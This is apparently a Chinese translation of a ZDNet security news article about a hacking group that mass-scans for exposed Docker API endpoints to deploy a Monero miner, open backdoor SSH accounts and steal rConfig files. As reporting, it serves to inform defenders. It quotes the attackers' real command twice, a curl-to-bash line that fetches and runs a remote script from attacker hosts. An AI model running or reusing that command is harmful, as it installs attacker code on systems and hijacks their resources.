现在都快 2020 年了，但还有不少系统管理员，仍然将 Docker 管理端口暴露在互联网上。

目前，有家黑客组织正在互联网上进行大规模的扫描，试图寻找那些在互联网上暴露了 API 端点的 Docker 平台。

黑客组织这次扫描行动的目的，是让他们能够向 Docker 实例发送命令，并在公司的 Docker 实例上部署加密货币挖矿程序，最终利用他们的算力进行挖矿，从而为黑客组织自身带来利益。

专业行动

这次大规模扫描行动于 11 月 24 日开始，由于扫描行动的规模极其庞大，因此一开始就立即引起了人们的注意。

Bad Packets LLC 的首席研究官兼联合创始人 Troy Mursch 对 ZDNet 称：“Bad Packets CTI API 的用户应该清楚利用暴露的 Docker 实例进行攻击并非什么新鲜事，而且这种行为经常发生。”

他指出，“黑客组织这次行动的不同之处在于，他们这次扫描行动规模特别夸张。仅此一点，就值得我们进一步调查，分析他们利用僵尸网络的意图究竟是什么。”

作为本次扫描行动的发现者，Mursch 说：“正如其他人指出的，这次行动的规模可不是那种脚本攻击的小孩把戏。黑客组织在这次扫描行动中投入了大量精力，但我们还没有搞清楚他们到底想干什么。”

推特用户 Bad Packets Report（@bad_packets）在 11 月 25 日发推文称：

这是一场扫描互联网上暴露的 Docker API 端点的随机性大规模扫描行动。
这些扫描行动利用 Alpine Linux 映像来创建一个容器，并通过以下方式执行有效负载：
"Command": chroot /mnt /bin/sh -c 'curl -sL4 https://t.co/q047bRPUyj | bash;'

目前我们所掌握的情况

到目前为止，我们所知道的是，这些攻击背后的组织正在扫描超过 59000 个 IP 网络（网络块），试图寻找暴露的 Docker 实例。

一旦黑客组织识别出暴露的主机后，攻击者就会使用 API 端点启动 Alpine Linux OS 容器，并在其中执行以下命令：

chroot /mnt /bin/sh -c 'curl -sL4 http://ix.io/1XQa | bash;

上面的命令从攻击者的服务器下载并运行一份 Bash 脚本。这个脚本的作用就是在目标设备上安装一个经典 XMRRig 加密货币的挖矿程序。Mursch 指出，在这次行动开始后的两天，黑客组织已经挖出了 14.82 枚门罗币（XMR），其价格略高于 740 美元。

此外，Mursch 还发现，这种恶意扫描行动还有某种自我防御的机制。

Mursch 告诉我们：“这次黑客行动，虽然并非原创，但我们观察到一个有趣的情况，就是黑客组织会从 http://ix.io/1XQh 下载脚本来卸载已知的监视代理程序并杀死大量相关进程。”

Mursch 通过检查这个脚本，还发现黑客组织不仅正在试图禁用安全产品，还关闭了与竞争对手的加密货币挖矿僵尸网络（如 DDG）相关的 LSO 进程。

此外，Mursch 还发现，这个恶意脚本还有一个功能，就是它能够通过扫描受感染的主机来查找 rConfig 配置文件，并对其进行加密和窃取，然后将文件发送回黑客组织的服务器（一般是僵尸网络）。

此外，Sandfly Security 的创始人 Craig H. Rowland 也注意到，黑客组织还在被入侵的容器上创建后门账户，并留下 SSH 密钥以便更方便他们日后进行访问，这样，他们就可以从远程控制所有受感染的肉鸡目标。

Mursch 建议，运行 Docker 实例的用户和组织，应立即检查自己是否在互联网上公开了 API 端点，如果已经公开，就立即关闭端口，然后关停无法识别的运行中的容器。

作者介绍：

Catalin Cimpanu，ZDNet 的信息安全记者，负责报道网络安全、数据泄露、黑客攻击和其他相关话题。此前曾担任 Bleeping Computer 和 Softpedia 的信息安全记者。

原文链接：

A hacking group is hijacking Docker systems with exposed API endpoints

创作场景

黑客组织劫持 Docker 系统挖掘加密货币